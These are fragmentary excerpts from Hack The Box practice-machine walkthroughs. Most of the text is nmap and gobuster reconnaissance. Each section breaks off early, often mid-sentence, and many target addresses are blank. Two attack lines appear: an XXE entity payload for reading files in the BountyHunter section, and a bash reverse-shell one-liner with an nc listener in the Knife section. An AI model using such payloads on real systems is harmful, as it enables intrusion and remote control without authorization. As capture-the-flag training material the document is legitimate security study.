HTB BountyHunter

$ nmap -A -T4 -v

Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

As we can observe in Burp, the data is URL + base64 encoded. It's XML data, so we could try an XXE. Using CyberChef ( on we also find:

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file_to_use"> ]>

We can use to check other files

HTB Love

$ nmap -A -p- -T4

Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
ssl-cert: Subject:
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd

HTB Knife

$ nmap
$ nmap -p- -v
$ whatweb
$ searchsploit php 8.1.0-dev
$ searchsploit -m php/webapps/
$ python3
$ id

Using this exploit we get a reverse shell, but it is not very useful, so we can try to get a better one.

$ python3 -u -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"
$ sudo nc -lvnp 4444
james@knife:/$ ls
james@knife:/$ cd /home
james@knife:/home$ ls
james@knife:/home$


$ nmap -A -p- -T4 -Pn

Open ports:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn

Dashboard Security Snapshot IP Config Network status Security Snapshot

Using Burp we can discover the content of the site and discover if there is anything else in the content data. Using the Burp Discover functionality we can obtain also if

HTB Explore

Rustscan is a fast port scanner that promises to scan all 65k ports in 3 seconds. We can use it to perform a full port scan and then use the results in combination with Nmap.

$ rustscan -a
$ sudo nmap -sV -sC -p 2222,42135,42507,59777

In the port scan, we found different open ports. As usual, the ssh port is not a common port to start testing, so

HTB Scriptkiddie

$ nmap -A -p- -T4

Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)

Accessing to

On this site we can observe that nmap and msfvenom are used.

$ searchsploit msfvenom

For nmap we don't get much from searchsploit, but for msfvenom we get exactly 1 result, so it is worth trying.

msf6 > search venom

HTB Delivery

Add the box to the hosts file.

$ sudo nano /etc/hosts
$ nmap delivery.htb -A -p- -T4

Open ports:

Site inspection:
http://delivery.htb
http://delivery.htb/#contact-us
http://delivery.htb:8065

As you can create a user on the Mattermost server, we can start here: http://delivery.htb:8065/should_verify_email?

We should verify the email, but no email is going to be received, so we need to find another way. If we focus on the Helpdesk site, we can create a

HTB Academy

$ sudo nano /etc/hosts
$ nmap academy.htb -A -p- -T4

Open ports:
22 (tcp) - ssh
80 (tcp) - http
33060 (tcp) - mysql

Access to http://academy.htb

$ python ~/tools/dirsearch/ -u http://academy.htb

http://academy.htb/admin.php
http://academy.htb/register.php

After this step, we would be able to log in to this site. Inspecting with Burp Suite the request sent when we register our user, we can observe:

What would happen if we change this value when creating a new user? Modify

HTB Heist

$ nmap -sC -sV -oA all -vv -p-
$ gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e
$ gobuster dir -u -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php

Accessing to

There is a "Login as Guest" option. There is an "Attachment" link. The message talks about a Cisco router. Hazard asked for a user account to be created for him, so there should be a "hazard" username. Testing the admin credentials we've just found. We need an

HTB Traceback

$ nmap -A -T4 -p-

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29

Access to

Can we assume that there is a web shell on this box? Let's try to find out.

$ gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

With our usual wordlist there are no interesting results. Let's try a different one, taking into account the comment on the main site that talked about web shells...

$ gobuster dir